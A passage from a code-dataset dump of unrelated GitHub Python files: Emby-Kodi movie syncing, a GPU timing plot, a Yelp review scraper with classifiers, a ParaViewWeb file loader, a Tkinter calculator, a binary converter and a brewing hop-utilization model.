MovieID not in CurrentBoxSetMovies:\n Data = self.emby_db.get_item_by_id(MovieAssignedToBoxset['Id'])\n\n if not Data:\n xbmc.log(f\"EMBY.core.movies: Failed to process {MovieAssignedToBoxset['Name']} to boxset\", 1) # LOGINFO\n continue\n\n self.video_db.set_boxset(item['KodiItemIds'][ItemIndex], Data[0])\n KodiItemIds = len(Data[6].split(\";\")) * [str(item['KodiItemIds'][ItemIndex])] # Data[6] -> EmbyLibraryId\n KodiItemIds = \";\".join(KodiItemIds)\n self.emby_db.update_parent_id(KodiItemIds, MovieAssignedToBoxset['Id'])\n xbmc.log(f\"EMBY.core.movies: ADD to boxset [{item['KodiItemIds'][ItemIndex]} / {Data[0]}] {MovieAssignedToBoxset['Name']}: {MovieAssignedToBoxset['Id']} to boxset\", 1) # LOGINFO\n else:\n del CurrentBoxSetMovies[MovieID]\n\n for EmbyMovieId in CurrentBoxSetMovies:\n self.video_db.remove_from_boxset(CurrentBoxSetMovies[EmbyMovieId])\n self.emby_db.update_parent_id(None, EmbyMovieId)\n xbmc.log(f\"EMBY.core.movies: DELETE from boxset [{item['Id']}] {item['KodiItemIds'][ItemIndex]} {item['Name']}: {CurrentBoxSetMovies[EmbyMovieId]}\", 1) # LOGINFO\n\n common.set_KodiArtwork(item, self.EmbyServer.ServerData['ServerId'], False)\n self.video_db.common.add_artwork(item['KodiArtwork'], item['KodiItemIds'][ItemIndex], \"set\")\n self.emby_db.add_reference(item['Id'], item['KodiItemIds'], [], None, \"BoxSet\", \"set\", [], item['LibraryIds'], None, item['PresentationUniqueKey'], item['UserData']['IsFavorite'], None, None, None, None)\n xbmc.log(f\"EMBY.core.movies: UPDATE boxset [{item['Id']}] {item['KodiItemIds'][ItemIndex]} {item['Name']}\", 1) # LOGINFO\n\n return True\n\n # This updates: Favorite, LastPlayedDate, Playcount, PlaybackPositionTicks\n def userdata(self, Item):\n if not common.library_check(Item, self.EmbyServer, self.emby_db):\n return\n\n if Item['PlayedPercentage'] and Item['PlayedPercentage']:\n RuntimeSeconds = int(Item['PlaybackPositionTicks'] / Item['PlayedPercentage'] / 100000)\n else:\n RuntimeSeconds = 0\n\n common.set_playstate(Item)\n\n for ItemIndex in range(len(Item['Librarys'])):\n self.video_db.set_Favorite(Item['IsFavorite'], Item['KodiItemIds'][ItemIndex], \"movie\")\n self.video_db.update_bookmark_playstate(Item['KodiFileIds'][ItemIndex], Item['PlayCount'], Item['LastPlayedDate'], Item['PlaybackPositionTicks'], RuntimeSeconds)\n self.emby_db.update_favourite(Item['IsFavorite'], Item['Id'])\n xbmc.log(f\"EMBY.core.movies: New resume point {Item['Id']}: {Item['PlaybackPositionTicks']}\", 0) # LOGDEBUG\n xbmc.log(f\"EMBY.core.movies: USERDATA [{Item['KodiFileIds'][ItemIndex]} / {Item['KodiItemIds'][ItemIndex]}] {Item['Id']}\", 1) # LOGINFO\n\n def remove(self, Item):\n if Item['Type'] == 'Movie':\n self.remove_movie(Item['KodiItemId'], Item['KodiFileId'], Item['Id'], Item['Library']['Id'])\n\n if not Item['DeleteByLibraryId']:\n StackedIds = self.emby_db.get_stacked_embyid(Item['PresentationUniqueKey'], Item['Library']['Id'], \"Movie\")\n\n if StackedIds: # multi version\n xbmc.log(f\"EMBY.core.movies: DELETE multi version movies from embydb {Item['Id']}\", 1) # LOGINFO\n\n for StackedId in StackedIds:\n StackedItem = self.EmbyServer.API.get_Item(StackedId[0], ['Movie'], False, False)\n\n if StackedItem:\n StackedItem['Library'] = Item['Library']\n xbmc.log(f\"EMBY.core.movies: UPDATE remaining multi version movie {StackedItem['Id']}\", 1) # LOGINFO\n self.movie(StackedItem) # update all remaining multiversion items\n else:\n self.emby_db.remove_item(StackedId[0], Item['Library']['Id'])\n elif Item['Type'] == 'BoxSet':\n self.remove_boxset(Item['KodiItemId'], Item['KodiFileId'], Item['Id'], Item['Library']['Id'])\n elif Item['Type'] == 'SpecialFeature':\n self.remove_specialfeature(Item['Id'], Item['Library']['Id'])\n\n def remove_specialfeature(self, EmbyItemId, EmbyLibraryId):\n self.emby_db.remove_item(EmbyItemId, EmbyLibraryId)\n xbmc.log(f\"EMBY.core.movies: DELETE specialfeature {EmbyItemId}\", 1) # LOGINFO\n\n def remove_movie(self, KodiItemId, KodiFileId, EmbyItemId, EmbyLibraryId):\n common.delete_ContentItem(EmbyItemId, KodiItemId, KodiFileId, self.video_db, self.emby_db, \"movie\", EmbyLibraryId)\n self.video_db.delete_movie(KodiItemId, KodiFileId)\n xbmc.log(f\"EMBY.core.movies: DELETE movie [{KodiItemId} / {KodiFileId}] {EmbyItemId}\", 1) # LOGINFO\n\n def remove_boxset(self, KodiId, KodiFileId, EmbyItemId, EmbyLibrayId):\n for movie in self.emby_db.get_item_by_parent_id(KodiId, \"movie\"):\n self.video_db.remove_from_boxset(movie[1])\n self.emby_db.update_parent_id(None, movie[0])\n\n self.video_db.common.delete_artwork(KodiId, \"set\")\n self.video_db.delete_boxset(KodiId)\n self.emby_db.remove_item(EmbyItemId, EmbyLibrayId)\n xbmc.log(f\"EMBY.core.movies: DELETE boxset [{KodiId} / {KodiFileId}] {EmbyItemId}\", 1) # LOGINFO\n","repo_name":"MediaBrowser/plugin.video.emby","sub_path":"core/movies.py","file_name":"movies.py","file_ext":"py","file_size_in_byte":13353,"program_lang":"python","lang":"en","doc_type":"code","stars":278,"dataset":"github-code","pt":"77"} +{"seq_id":"35139558121","text":"import numpy as np\nfrom matplotlib import pyplot as plt\n\nx = np.array([1e6, 3e6, 6e6, 1e7, 3e7, 6e7, 1e8])\ncputimes = np.array([50.0, 147.0, 293.0, 491.0, 1473.0, 3005.0, 4977.0])\ngputimes = np.array([3.72244, 4.24126, 4.71751, 5.69286, 8.8244, 14.7054, 21.627])\n\nfig, ax1 = plt.subplots()\nax2 = ax1.twinx()\n\nax1.plot(x, gputimes, \".-\", color=\"#FF0000\", linewidth=2.5, markersize=7.5)\nax1.set_xlabel(\"Number of Neutrons\", fontsize=22)\nax1.set_ylabel(\"McVineGPU Execution Time (s)\", color=\"#FF0000\", fontsize=22)\nax1.set_ylim(0, 25)\nax1.tick_params(\"x\", labelsize=18)\nax1.tick_params(\"y\", colors=\"#FF0000\", labelsize=18)\n\nax2.plot(x, cputimes, \".-\", color=\"#0000FF\", linewidth=2.5, markersize=7.5)\nax2.set_ylabel(\"MCViNE Execution Time (s)\", color=\"#0000FF\", fontsize=22)\nax2.tick_params(\"y\", colors=\"#0000FF\", labelsize=18)\n\nfig.suptitle(\"Timing Comparison of MCViNE vs McVineGPU\", y=0.95, fontsize=24)\n\nplt.show()\n","repo_name":"mcvine/McVineGPU","sub_path":"python/timingGraph.py","file_name":"timingGraph.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71507931770","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[88]:\n\n\nimport numpy as np\nimport pandas as pd\nimport json\nimport requests\n# import sys\n# import io\n\n\n# ## set the http-headers\n\n# In[89]:\n\n\nua=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36\" \nheaders={\"User-Agent\":ua} #environment setting\n\n\n# \n\n# In[90]:\n\n\nreviews=[]\nscores=[]\nscoresd={}\ndef get_review_content(baseurl,start,end):\n \n for i in range(start,end,10):\n url=baseurl + \"&start={}\".format(i)\n resp = requests.get(url,headers=headers)\n jsnStr=json.loads(resp.text)\n if(len(jsnStr['reviews'])==0):\n print(\"no more comments, stopping\")\n break\n for review in jsnStr['reviews']:\n text=review['comment']['text']\n score=review[\"rating\"]\n #print(json.dumps(review,indent=2))\n text=text.replace(\"'\",\"_\").replace(\"
\",\"\")\n reviews.append(text)\n scores.append(score)\n if(score not in scoresd):\n scoresd[score]=0\n scoresd[score]+=1\n return 'crawling finished'\n\n\n# In[91]:\n\n\nburl=\"https://www.yelp.com/biz/FH978pIP1TLRuPAH-MbWIQ/review_feed?rl=en&q=&sort_by=rating_asc\"\nburl2=\"https://www.yelp.com/biz/EGS6y6WsPkNs8PZ2X6bHOA/review_feed?rl=en&q=&sort_by=relevance_desc\"\nget_review_content(burl2,0,1000)\n\n\n# In[92]:\n\n\n# # take a look on example data\nexample_index=0\nprint(\"review: {}\".format(reviews[example_index]))\nprint(\"score: {}\".format(scores[example_index]))\n\nprint(scoresd) # see how the score distributed\n\n\n# In[108]:\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n# vectorizer = CountVectorizer(max_df=0.8,min_df=0.15)\nvectorizer = TfidfVectorizer(max_df=0.8,min_df=0.15)\n\nvectorizer.fit(reviews)\nX=vectorizer.transform(reviews)#result in sparse matrix\n\n\n# In[94]:\n\n\ny=[] # if score less or equal to 3, we will assign it to 0 which mean bad review,otherwise we will assign it to 1 which means good review\nfor i in range(len(scores)):\n if(scores[i]<=3):\n y.append(0)\n\n else:\n y.append(1)\n\n\n# In[95]:\n\n\nprint(X.todense()[0])\nprint('----')\nprint(X[0])\nprint(X.shape)\nprint(reviews[0])\nprint(len(reviews))\nprint(len(reviews[0]))\nprint(vectorizer.get_feature_names())\nprint(len(y))\n\n\n# In[96]:\n\n\nfrom sklearn.model_selection import train_test_split\nX_train,X_test,y_train,y_test = train_test_split(X.todense(),y,test_size=0.21,random_state=42) #split the data to train set and test set\nprint(X_train.shape)\nprint(X_test.shape)\nprint(y_test)\n\n\n# In[97]:\n\n\nfrom sklearn.linear_model import LogisticRegression\n\nmodel = LogisticRegression()\n\nmodel.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[98]:\n\n\ny_pred = model.predict(X_test)\nprint(y_pred)\n\n\n# In[99]:\n\n\nfrom sklearn.metrics import classification_report\n\nr = classification_report(y_test,y_pred)\nprint(r)\n\n\n# In[100]:\n\n\nfrom sklearn import svm\nfrom sklearn.preprocessing import StandardScaler\n\n\n#regularization\nsc = StandardScaler()\n\nxtrain = sc.fit_transform(X_train)\nxtest = sc.transform(X_test)\n\n\n# In[101]:\n\n\nmodel = svm.SVC()\nmodel.fit(xtrain, y_train)\ny_pred = model.predict(xtest)\nprint(y_pred)\nr = classification_report(y_test,y_pred)\nprint(r)\n\n\n# In[102]:\n\n\nfrom sklearn import tree\ntr = tree.DecisionTreeClassifier()\ntr.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[103]:\n\n\ntree_predict = tr.predict(X_test)\nprint(tree_predict)\nrc = classification_report(y_test,tree_predict)\nprint(rc)\n\n\n# In[104]:\n\n\nfrom sklearn.ensemble import GradientBoostingClassifier\ngdb = GradientBoostingClassifier() #取长补短\ngdb.fit(X_train, y_train)\nprint(\"training done.\")\n\n\n# In[105]:\n\n\ngdb_pred = gdb.predict(X_test)\ngdb_report = classification_report(y_test,gdb_pred)\nprint(gdb_report)\n\n\n# In[106]:\n\n\nimport lightgbm as lgb\nrng = lgb.LGBMClassifier()\nrng.fit(X_train, y_train)\nprint('training done')\n\n\n# In[107]:\n\n\nrng_pred = rng.predict(X_test)\nrng_report = classification_report(y_test,rng_pred)\nprint(rng_report)\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"yaozile123/Web-Crawling-and-Classification-of-Yelp-Reviews","sub_path":"whole_code.py","file_name":"whole_code.py","file_ext":"py","file_size_in_byte":4079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73289964088","text":"r\"\"\"\n This module is a ParaViewWeb server application.\n The following command line illustrate how to use it::\n\n $ pvpython .../pv_web_file_loader.py --data-dir /.../path-to-your-data-directory --file-to-load /.../any-vtk-friendly-file.vtk\n\n --file-to-load is optional and allow the user to pre-load a given dataset.\n\n --data-dir is used to list that directory on the server and let the client\n choose a file to load.\n\n --ds-host None\n Host name where pvserver has been started\n\n --ds-port 11111\n Port number to use to connect to pvserver\n\n --rs-host None\n Host name where renderserver has been started\n\n --rs-port 22222\n Port number to use to connect to the renderserver\n\n Any ParaViewWeb executable script come with a set of standard arguments that\n can be overriden if need be::\n\n --port 8080\n Port number on which the HTTP server will listen to.\n\n --content /path-to-web-content/\n Directory that you want to server as static web content.\n By default, this variable is empty which mean that we rely on another server\n to deliver the static content and the current process only focus on the\n WebSocket connectivity of clients.\n\n --authKey vtkweb-secret\n Secret key that should be provided by the client to allow it to make any\n WebSocket communication. The client will assume if none is given that the\n server expect \"vtkweb-secret\" as secret key.\n\"\"\"\n\n# import to process args\nimport sys\nimport os\n\n# import paraview modules.\nfrom paraview import simple\nfrom paraview.web import wamp as pv_wamp\nfrom paraview.web import protocols as pv_protocols\n\nfrom vtk.web import server\nfrom vtkWebCorePython import *\n\n# import annotations\nfrom autobahn.wamp import exportRpc\n\ntry:\n import argparse\nexcept ImportError:\n # since Python 2.6 and earlier don't have argparse, we simply provide\n # the source for the same as _argparse and we use it instead.\n import _argparse as argparse\n\n# =============================================================================\n# Create custom File Opener class to handle clients requests\n# =============================================================================\n\nclass _FileOpener(pv_wamp.PVServerProtocol):\n\n # Application configuration\n reader = None\n fileToLoad = None\n pathToList = \".\"\n view = None\n authKey = \"vtkweb-secret\"\n dsHost = None\n dsPort = 11111\n rsHost = None\n rsPort = 11111\n\n def initialize(self):\n # Bring used components\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebStartupRemoteConnection(_FileOpener.dsHost, _FileOpener.dsPort, _FileOpener.rsHost, _FileOpener.rsPort))\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebFileListing(_FileOpener.pathToList, \"Home\"))\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebMouseHandler())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPort())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortImageDelivery())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebViewPortGeometryDelivery())\n self.registerVtkWebProtocol(pv_protocols.ParaViewWebTimeHandler())\n\n # Update authentication key to use\n self.updateSecret(_FileOpener.authKey)\n\n # Create default pipeline\n if _FileOpener.fileToLoad:\n _FileOpener.reader = simple.OpenDataFile(_FileOpener.fileToLoad)\n simple.Show()\n\n _FileOpener.view = simple.Render()\n _FileOpener.view.ViewSize = [800,800]\n # If this is running on a Mac DO NOT use Offscreen Rendering\n #view.UseOffscreenRendering = 1\n simple.ResetCamera()\n else:\n _FileOpener.view = simple.GetRenderView()\n simple.Render()\n _FileOpener.view.ViewSize = [800,800]\n simple.SetActiveView(_FileOpener.view)\n\n def openFile(self, files):\n id = \"\"\n if _FileOpener.reader:\n try:\n simple.Delete(_FileOpener.reader)\n except:\n _FileOpener.reader = None\n try:\n _FileOpener.reader = simple.OpenDataFile(files)\n simple.Show()\n simple.Render()\n simple.ResetCamera()\n id = _FileOpener.reader.GetGlobalIDAsString()\n except:\n _FileOpener.reader = None\n return id\n\n @exportRpc(\"openFileFromPath\")\n def openFileFromPath(self, files):\n fileToLoad = []\n if type(files) == list:\n for file in files:\n fileToLoad.append(os.path.join(_FileOpener.pathToList, file))\n else:\n fileToLoad.append(os.path.join(_FileOpener.pathToList, files))\n return self.openFile(fileToLoad)\n\n# =============================================================================\n# Main: Parse args and start server\n# =============================================================================\n\nif __name__ == \"__main__\":\n # Create argument parser\n parser = argparse.ArgumentParser(description=\"ParaView/Web file loader web-application\")\n\n # Add default arguments\n server.add_arguments(parser)\n\n # Add local arguments\n parser.add_argument(\"--file-to-load\", help=\"relative file path to load based on --data-dir argument\", dest=\"data\")\n parser.add_argument(\"--data-dir\", default=os.getcwd(), help=\"Base path directory\", dest=\"path\")\n parser.add_argument(\"--ds-host\", default=None, help=\"Hostname to connect to for DataServer\", dest=\"dsHost\")\n parser.add_argument(\"--ds-port\", default=11111, type=int, help=\"Port number to connect to for DataServer\", dest=\"dsPort\")\n parser.add_argument(\"--rs-host\", default=None, help=\"Hostname to connect to for RenderServer\", dest=\"rsHost\")\n parser.add_argument(\"--rs-port\", default=11111, type=int, help=\"Port number to connect to for RenderServer\", dest=\"rsPort\")\n\n\n # Exctract arguments\n args = parser.parse_args()\n\n # Configure our current application\n _FileOpener.fileToLoad = args.data\n _FileOpener.pathToList = args.path\n _FileOpener.authKey = args.authKey\n _FileOpener.dsHost = args.dsHost\n _FileOpener.dsPort = args.dsPort\n _FileOpener.rsHost = args.rsHost\n _FileOpener.rsPort = args.rsPort\n\n # Start server\n server.start_webserver(options=args, protocol=_FileOpener)\n","repo_name":"leemargetts/ParaFEM","sub_path":"demo-installer-win/vendor/ParaView 4.1.0/lib/paraview-4.1/site-packages/paraview/web/pv_web_file_loader.py","file_name":"pv_web_file_loader.py","file_ext":"py","file_size_in_byte":6530,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"77"} +{"seq_id":"7719239486","text":"import math\nfrom tkinter import *\n#from tkinter import ttk\nimport tkinter.font as font\nroot=Tk()\nroot.title(\"Calculator\")\nroot.geometry(\"570x600\")\nroot.resizable(False,False)\nroot.configure(bg='#17161b') \n\n#e=Entry(root, width=70, bg=\"light grey\", fg=\"black\")\n\n\ne=Entry(root,width=25,font=(\"arial\",30))\ne.grid(row=0, column=0, columnspan=4, padx=10, pady=25)\n#label.pack()\n\nbuttonFont = font.Font(size=20,family='arial',weight='bold')\n\n#e.insert(0,\"Enter The Number: \")\n\n#equation=\"\"\n\ndef click (number):\n #global equation\n #equation+=number\n num1=e.get()\n e.delete(0,END)\n e.insert(0,str(num1)+str(number))\n \n # hello=\"Hello \"+e.get()\n # label=Label(root,text=hello)\n # label.pack()\ndef clear():\n e.delete(0,END)\n \ndef add():\n one_num=e.get()\n global f_num\n global math\n math=\"addition\"\n f_num=int(one_num)\n e.delete(0,END)\n\ndef div():\n one_num=e.get()\n global f_num\n global math\n math=\"division\"\n f_num=int(one_num)\n e.delete(0,END)\n\ndef sub():\n one_num=e.get()\n global f_num\n global math\n math=\"subtraction\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef mul():\n one_num=e.get()\n global f_num\n global math\n math=\"multiplication\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef percent():\n one_num=e.get()\n global f_num\n global math\n math=\"percent\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef squ():\n one_num=e.get()\n global f_num\n global math\n math=\"squ\"\n f_num=int(one_num)\n e.delete(0,END)\n \ndef expo():\n one_num=e.get()\n global f_num\n global math\n math=\"expo\"\n f_num=int(one_num)\n e.delete(0,END)\n \n \ndef equal():\n \n if math==\"addition\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num+int(sc_num))\n if math==\"subtraction\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num-int(sc_num))\n if math==\"multiplication\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num*int(sc_num))\n if math==\"division\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,f_num/int(sc_num))\n if math==\"percent\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,(int(sc_num)*(f_num/100)))\n if math==\"squ\":\n #sc_num=e.get()\n #e.delete(0,END)\n e.insert(0,(f_num*f_num))\n if math==\"expo\":\n sc_num=e.get()\n e.delete(0,END)\n e.insert(0,(f_num**int(sc_num)))\n \n\n \n \nbuttonclear=Button(root, text=\"C\", bg=\"#3697f5\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=clear) \nbuttonper =Button(root, text=\"%\", bg=\"#2a2d36\",fg=\"#fff\", font= buttonFont, padx=40,pady=20,command=percent)\nbuttonmul=Button(root, text=\"X\", bg=\"#2a2d36\",fg=\"#fff\",font= buttonFont,padx=45,bd=1,pady=20,command=mul)\nbuttondiv =Button(root, text=\"/\", bg=\"#2a2d36\",fg=\"#fff\",font= buttonFont,bd=1, padx=47,pady=20,command=div)\n\nbutton7=Button(root, text=\"7\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(7))\nbutton8=Button(root, text=\"8\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(8))\nbutton9=Button(root, text=\"9\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(9))\nbuttonsub=Button(root, text=\"-\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=49,pady=20,command=sub)\n\n\nbutton4=Button(root, text=\"4\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(4))\nbutton5=Button(root, text=\"5\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(5))\nbutton6=Button(root, text=\"6\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(6))\nbuttonadd=Button(root, text=\"+\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=add)\n\n\n\nbutton1=Button(root, text=\"1\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(1))\nbutton2=Button(root, text=\"2\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(2))\nbutton3=Button(root, text=\"3\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(3))\n\n\n\nbutton0=Button(root, text=\"0\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=20,command=lambda: click(0))\nbuttonsqu=Button(root, text=\"x^2\", bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=30,pady=20,command=squ)\nbuttonexpo=Button(root, text=\"x^y\",bg=\"#2a2d36\",fg=\"#fff\",font=buttonFont,bd=1,padx=30,pady=20,command=expo)\nbuttonequal=Button(root, text=\"=\",bg=\"#fe9037\",fg=\"#fff\",font=buttonFont,bd=1,padx=45,pady=70,command=equal)\n \n\n\n\nbuttondiv.grid(row=1,column=1)\nbuttonmul.grid(row=1,column=2)\nbuttonper.grid(row=1,column=3)\nbuttonclear.grid(row=1,column=0)\n\nbutton7.grid(row=2,column=0)\nbutton8.grid(row=2,column=1)\nbutton9.grid(row=2,column=2)\nbuttonsub.grid(row=2,column=3)\n\nbutton4.grid(row=3,column=0)\nbutton5.grid(row=3,column=1)\nbutton6.grid(row=3,column=2)\nbuttonadd.grid(row=3,column=3)\n\nbutton1.grid(row=4,column=0)\nbutton2.grid(row=4,column=1)\nbutton3.grid(row=4,column=2)\n\nbutton0.grid(row=5,column=1)\nbuttonsqu.grid(row=5,column=2)\nbuttonexpo.grid(row=5,column=0)\n\n\nbuttonequal.grid(row=4,column=3,rowspan=2)\n \n \nroot.mainloop()\n","repo_name":"zilladeepak/GUICalculator","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":5260,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29337456819","text":"#Conversión de Decimal a Binario\ndef binario(numero):\n Binario = \" \"\n \n while numero // 2 != 0:\n Binario = str(numero%2) + Binario \n numero = numero // 2\n \n return str(numero) + Binario\n\nx = float(input(\"ingrese un numero decimal: \"))\nresultado = binario(int(x))\n\nprint(\"resultado=\"+ resultado)","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej4/hito1_ej4_9846d17f6f661df48283dab7735a6e79.py","file_name":"hito1_ej4_9846d17f6f661df48283dab7735a6e79.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"42572221841","text":"\"\"\"\nMathematics for hop-related calculations for recipes/plotting.\nAbbreviations:\n alpha acid: AA\n specific gravity: G\n original gravity: OG\n temperature: T\n time: t (minutes)\n\"\"\"\nimport numpy as np\nfrom MegaBeer.science import reaction\nfrom MegaBeer.science.heat import NewtonCooling\n# from scipy.interpolate import RectBivariateSpline as rbs\nfrom scipy.integrate import quad, odeint\nfrom scipy.interpolate import interp1d\n\n\nclass MaloShell:\n \"\"\" Container class for Malowicki & Shellhammer 2005 function constructors.\n Note: c = [c1, c2, c3] = [AA, iso-AA, degradation products]\n \"\"\"\n @staticmethod\n def maloshell_constant_temp(k1, k2):\n \"\"\" AA isomizeration rates using the Malowicki & Shellhammer 2005\n model for a fixed gravity. pH fixed to 5.2. Assumes k1 !=k2.\n\n For a fixed temperature T, the total isomizeration rate is a\n function of time: c_iso(t) = const * f(t)\n Args:\n k1 (float): Isomerization reaction rate\n k2 (float): Iso-AA degradation rate\n \n Returns:\n numpy.ndarray: 3d vector of fractional concentration functions \n \"\"\"\n c1 = lambda t: k1 * np.exp(-k1 * t)\n c2 = lambda t: k1 / (k2 - k1) * (np.exp(-k1 * t) - np.exp(-k2 * t))\n c3 = lambda t: k2 * np.exp(-k2 * t)\n return np.asarray([c1, c2, c3])\n\n @staticmethod\n def maloshell_boil_temp():\n \"\"\" Malowicki & Shellhammer 2005 model but with fixed boiling temperature.\n Refer to table 3 in paper: k1 = 0.01141, k2 = 0.00263 for T=100.\n Args:\n t (float or numpy.ndarray): Boil time.\n \n Returns:\n float or numpy.ndarray: time component of utilization fraction\n \"\"\"\n k1_boil = 0.01141\n k2_boil = 0.00263\n return MaloShell.maloshell_constant_temp(k1_boil, k2_boil)\n\n @staticmethod\n def maloshell_cooling(A1, A2, Ea_1, Ea_2, c0, tau=132.5, T_room=21.1):\n \"\"\" Approximates isomizeration rate during cooling, and assumes no\n significant isomizeration after one e-fold (tau minutes) have past.\n Default tau is taken from cooling one gallon of water\n in an 8 quart stainless steel stock pot with a steel lid on.\n Args:\n A1 (float): Exponential prefactor for k1.\n A2 (float): Exponential prefactor for k2.\n Ea_1 (float): Activation energy for reaction 1.\n Ea_2 (float): Activation energy for reaction 2.\n c0 (np.ndarray): Initial condition vector.\n tau (float): Cooling rate time scale in minutes. Default is 132.5 min.\n T_room (float): Room temperature water is cooling in. Default is 21.1 C (70 F).\n \n Returns:\n function: Utilization function vector for c1, c2, c3\n \"\"\"\n # Make sure c0 is an array:\n c0 = np.asarray(c0)\n\n # Create time array with spacings of one minute.\n t_arr = np.linspace(0., tau, np.ceil(tau) + 1)\n\n # Grab the Newton Cooling function T(t) with T0=T_room and Ti=100 C\n temp_func = NewtonCooling.T(T_room, 100., tau)\n\n # Get rate functions:\n k1_func = lambda t: reaction.arrhenius(Ea_1, A1)(temp_func(t))\n k2_func = lambda t: reaction.arrhenius(Ea_2, A2)(temp_func(t))\n\n def dcdt(c, t):\n # Internal function to solve ODE. c = np.array([c1, c2, c3])\n M = np.zeros((3, 3))\n M[0, 0] = -reaction.RateEquations.dkn_dt(1, k1_func(t))(t)\n M[1, 0] = reaction.RateEquations.dkn_dt(1, k1_func(t))(t)\n M[1, 1] = -reaction.RateEquations.dkn_dt(1, k2_func(t))(t)\n M[2, 1] = reaction.RateEquations.dkn_dt(1, k2_func(t))(t)\n\n # print(M)\n return np.dot(M, c)\n\n c = odeint(dcdt, c0, t_arr)\n\n # Extrapolation fill values for each component of vector c.\n ext = [(c[0, i], c[-1, i]) for i in range(3)]\n\n # Linear interpolation for each vector component. Assumes no utilization below t=0\n # and fixed utilization above t value given as input.\n return np.asarry(\n [interp1d(t_arr, c[:, i], fill_value=ext[i]) for i in range(3)]\n )\n\n\nclass mIBU:\n \"\"\" Alchemy Overlords modified Tinseth utilization model accounting for cooling \n of wort after flameout. Note that the piecewise nature of these math functions\n complicated a functional approach, hence the OOP approach here.\n Args:\n max_u (float): Maximum utilization constant. Default is 0.241.\n r (float): Rate constant of growth. Default is 0.04.\n surface_area (float): Exposed wort surface area in square \n centimeters.\n open_area (float): Size of opening of pot in square centimeters.\n volume (float): Volume of wort in liters.\n \"\"\"\n def __init__(\n self, surface_area, open_area, volume, max_u=0.241, r=0.04\n ):\n self.surface_area = surface_area\n self.open_area = open_area\n self.volume = volume\n self.b = mIBU.calculate_b(surface_area, open_area, volume)\n self.max_u = max_u\n self.r = r\n\n @staticmethod\n def calculate_b(surface_area, open_area, volume):\n \"\"\" Timescale (tau equivalent) from Alchemy Overlord.\n Args:\n surface_area (float): Exposed wort surface area in square \n centimeters.\n open_area (float): Size of opening of pot in square centimeters.\n volume (float): Volume of wort in liters.\n \n Results:\n float: b\n \"\"\"\n eff_area = np.sqrt(surface_area * open_area)\n return 2.925e-4 * eff_area / volume + 5.38e-3\n\n def change_b(self, b):\n \"\"\" Convenience method to update b attribute\n Args:\n b (float): New b value\n \"\"\"\n if type(b) is float:\n self.b = b\n return True\n \n else:\n raise ValueError(float)\n\n def mIBU(self, t, t_boil, t_cool):\n \"\"\" Modified Tinseth from https://alchemyoverlord.wordpress.com/\n Args:\n t (float or numpy.ndarray): Iso time. Total time hop addition(s)\n is(are) the wort.\n t_boil (float): Boil time.\n t_cool (float): Cooling time.\n\n Results:\n float or numpy.ndarray: Time component of utilization fraction.\n \"\"\"\n\n # Convert float to array:\n t_arr = np.asarray(t)\n\n # Mask that is true is t >= t_cool, false otherwise:\n t_mask = t_arr >= t_cool\n\n # calculate utilization at constant temperature:\n boil_util = np.where(\n t_mask, TinsethTime.tinseth(max_u=self.max_u, r=self.r)(t_arr), 0.\n )\n\n # Cooling rate to integrate\n cool_rate = lambda x: TinsethTime.tinseth_rate(max_u=self.max_u, r=self.r)(x) * \\\n mIBU.mIBU_rate_correction(t, self.b)\n \n # Integrate to calculate cooling utilization. Note that t_cool - t\n # to t_cool is the total cooling time as t is the total time 